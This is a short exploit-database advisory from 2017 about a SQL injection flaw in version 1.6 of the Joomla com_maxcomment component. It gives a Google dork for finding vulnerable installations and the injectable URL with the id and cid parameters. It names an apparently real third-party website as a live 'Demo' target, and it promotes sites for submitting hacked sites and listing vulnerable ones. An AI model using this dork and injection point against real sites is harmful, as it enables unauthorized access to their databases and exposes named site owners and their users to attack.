Joomla Maxcomment component version 1.6 suffer from a remote SQL injection vulnerability.
38cfed519790c3a026d86e37e1408cd266a1d57caba956d1513fd6c72b246436
#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################
#####################################
# Iranian Exploit DataBase
# Joomla Component com_maxcomment Sql Injection Vulnerability
# Google Dork: inurl:index.php?option=com_maxcomment
# Date : 19/2/2017
# version : 1.6
# Category: Webapps
# Tested on: Windows
# Author : Amir ( iedb.team@gmail.com - https://telegram.me/AmirAm67)
# Site : IeDb.Ir - irist.ir - xssed.Ir
# Iedb Telegram : https://telegram.me/iedbteam
# Archive Exploit = http://iedb.ir/exploits-6897.html
#####################################
Bug :
http://localhost/[PATH]/index.php?option=com_maxcomment&task=report&id=[sql]&cid=[sql]&Itemid=1
Demo :
http://www.chilevision.cl/home/index.php?option=com_maxcomment&task=report&id=385201&cid=310451&Itemid=2834
#####################################
** http://iedb.ir ==>> Iranian Exploit DataBase And Iranian Security Team
** http://irist.ir ==>> submit hacked sites
** http://xssed.Ir ==>> Sign vulnerable sites ( xss and sql ) (Vulnerability attack information site)
Thanks to : C0dex,B3hz4d,Beni_vanda,Mr_time,Bl4ck M4n,black_security,Yasser,Ramin Assadian,Black_Nofuzi,SecureHost,1TED,Mr_Kelever,Mr_keeper,Mahmod,Iedb,Khashayar,B3hz4d4,Shabgard,Cl09er,
Be_lucky,Moslem Haghighian,Dr_Iman,8Bit,Javid,Esmiley_Amir,Mahdi_feizezade,Amin_Zohrabi,Shellshock3 And all my friends And All Member In Iedb.Ir Team
#####################################
# Archive Exploit = http://iedb.ir/exploits-6897.html
#####################################